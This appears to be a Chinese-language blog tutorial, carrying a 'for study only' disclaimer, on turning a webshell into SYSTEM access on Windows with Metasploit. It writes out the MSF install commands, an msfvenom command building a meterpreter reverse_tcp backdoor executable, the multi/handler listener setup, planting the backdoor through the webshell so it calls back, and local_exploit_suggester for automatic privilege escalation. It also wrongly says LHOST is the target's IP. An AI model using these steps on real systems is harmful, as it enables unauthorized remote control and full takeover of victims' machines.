免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等
目录
web--->system
拿到webshell后,我们通过MSF进行全自动的提权.
在linux上安装MSF
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 777 msfinstall
./msfinstall
msfconsole
模拟场景:
攻击机
靶机
--攻击机启动msf,生成后门(后面要反弹)(lhost为靶机ip地址,lport设置后别忘了.)
--攻击机 设置监听.(监听时 lhost 为0.0.0.0就行)
1-生成反弹后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=靶机IP LPORT=监听端口 -f exe -o msf.exe
(这里生成后门的端口 . 后面监听的时候也要保持一致!!!)
--将生成的后门放到网站的webshell,攻击机监听后运行一下.
2-配置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 --所有网关的某个端口都监听.
set lport 7788
run --进行监听
--靶机 运行 上面生成的后门 进行反弹.
--上线
--查看权限,是Administrator权限
--进行提权,全自动化,
3-利用EXP提权
background
use post/multi/recon/local_exploit_suggester
set showdescription true
set session 1
run
#use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补J)
#use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)
--产生能利用的模块,
--use一下,继续配置(lhost设置攻击机的)
--这里尽然生成了一个xxx.exe
--那我们就到其目录下,然后运行,最后查看权限.
--拿下windows的system权限~